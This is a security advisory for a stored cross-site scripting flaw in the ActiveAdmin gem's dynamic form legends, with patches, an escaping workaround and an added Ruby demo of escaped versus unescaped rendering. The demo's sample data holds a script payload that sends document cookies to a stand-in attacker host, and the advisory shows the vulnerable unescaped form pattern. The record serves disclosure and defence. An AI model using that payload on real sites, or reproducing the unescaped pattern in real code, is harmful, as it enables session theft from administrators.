
CVE-2024-37031 activeadmin

Package

Manager: gem
Name: activeadmin
Vulnerable Version: >=0 <3.2.2 || >=4.0.0.beta1 <4.0.0.beta7

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00221 pctl0.447

Details

activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends

### Impact

Users setting their Active Admin form legends dynamically may be vulnerable to stored XSS if the legend's value can be injected directly by a malicious user. For example:

* A public web application allows users to create entities with arbitrary names.
* Active Admin is used to administer these entities through a private backend.
* The form to edit these entities in the private backend has the following shape (note the dynamic `name` value, which depends on an attribute of the `resource`):

```ruby
form do |f|
  f.inputs name: resource.name do
    f.input :name
    f.input :description
  end
  f.actions
end
```

A malicious user could then create an entity whose name carries a payload that gets executed in the Active Admin administrator's browser. Both the implicit and the explicit way of passing the name (i.e., both `form resource.name` and `form name: resource.name`) suffer from the problem wherever the value of the name can be set arbitrarily by non-admin users.

### Patches

The problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7.

### Workarounds

Users can work around this problem without upgrading by explicitly escaping the form name using an HTML escaping utility. For example:

```ruby
form do |f|
  f.inputs name: ERB::Util.html_escape(resource.name) do
    f.input :name
    f.input :description
  end
  f.actions
end
```

Upgrading is nonetheless recommended.

### References

https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
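The following is an added example, not code from the advisory or from ActiveAdmin. It stands in for the rendering path the advisory describes with two hypothetical helpers: `legend_html_unescaped` interpolates the entity name into a `<legend>` as-is (the vulnerable behaviour), and `legend_html_escaped` applies the advisory's workaround with `ERB::Util.html_escape` first. `injected_markup?` checks whether any markup other than the template's own survives in the output, and `names_needing_escape` is a triage helper for finding entity names already stored in the database that would have rendered as markup. The entity names are constructed sample data.

```ruby
require "erb"

# Constructed sample of entity names as a non-admin user could have saved
# them through the public application. Not real data.
SAMPLE_NAMES = [
  "Acme Corp",
  "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  "Tom & Jerry \"Ltd\"",
].freeze

# Hypothetical stand-in for the vulnerable rendering path: the dynamic
# legend is interpolated into the fieldset markup without escaping.
def legend_html_unescaped(name)
  "<fieldset><legend>#{name}</legend></fieldset>"
end

# Same legend with the advisory's workaround applied: the caller escapes
# the name before it reaches the form DSL, so the browser sees text.
def legend_html_escaped(name)
  "<fieldset><legend>#{ERB::Util.html_escape(name)}</legend></fieldset>"
end

# Strips the template's own wrapper and reports whether any tag
# delimiters remain, i.e. whether user-controlled markup survived.
def injected_markup?(html)
  inner = html
    .sub(%r{\A<fieldset><legend>}, "")
    .sub(%r{</legend></fieldset>\z}, "")
  inner.match?(/[<>]/)
end

# Triage helper: which stored names change under HTML escaping? Those are
# the records that would have been rendered as markup by the vulnerable
# legend, so they are the ones to inspect for a payload.
def names_needing_escape(names)
  names.select { |n| n != ERB::Util.html_escape(n) }
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_NAMES.each do |name|
    puts "unescaped injected? #{injected_markup?(legend_html_unescaped(name))}"
    puts "escaped   injected? #{injected_markup?(legend_html_escaped(name))}"
  end
  puts "names to inspect: #{names_needing_escape(SAMPLE_NAMES).inspect}"
end
```

One caveat on the workaround: inside a Rails process, ActiveSupport overrides `ERB::Util.html_escape` to return an `html_safe` string, which is why the escaped legend is emitted once and not escaped again by the fixed versions; plain Ruby's `ERB::Util.html_escape`, as used here, returns an ordinary `String`.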

Metadata

Created: 2024-06-02T22:32:24Z
Modified: 2024-10-28T12:37:00Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-9mg6-x45v-hcfm/GHSA-9mg6-x45v-hcfm.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-9mg6-x45v-hcfm
Finding: F425
Auto approve: 1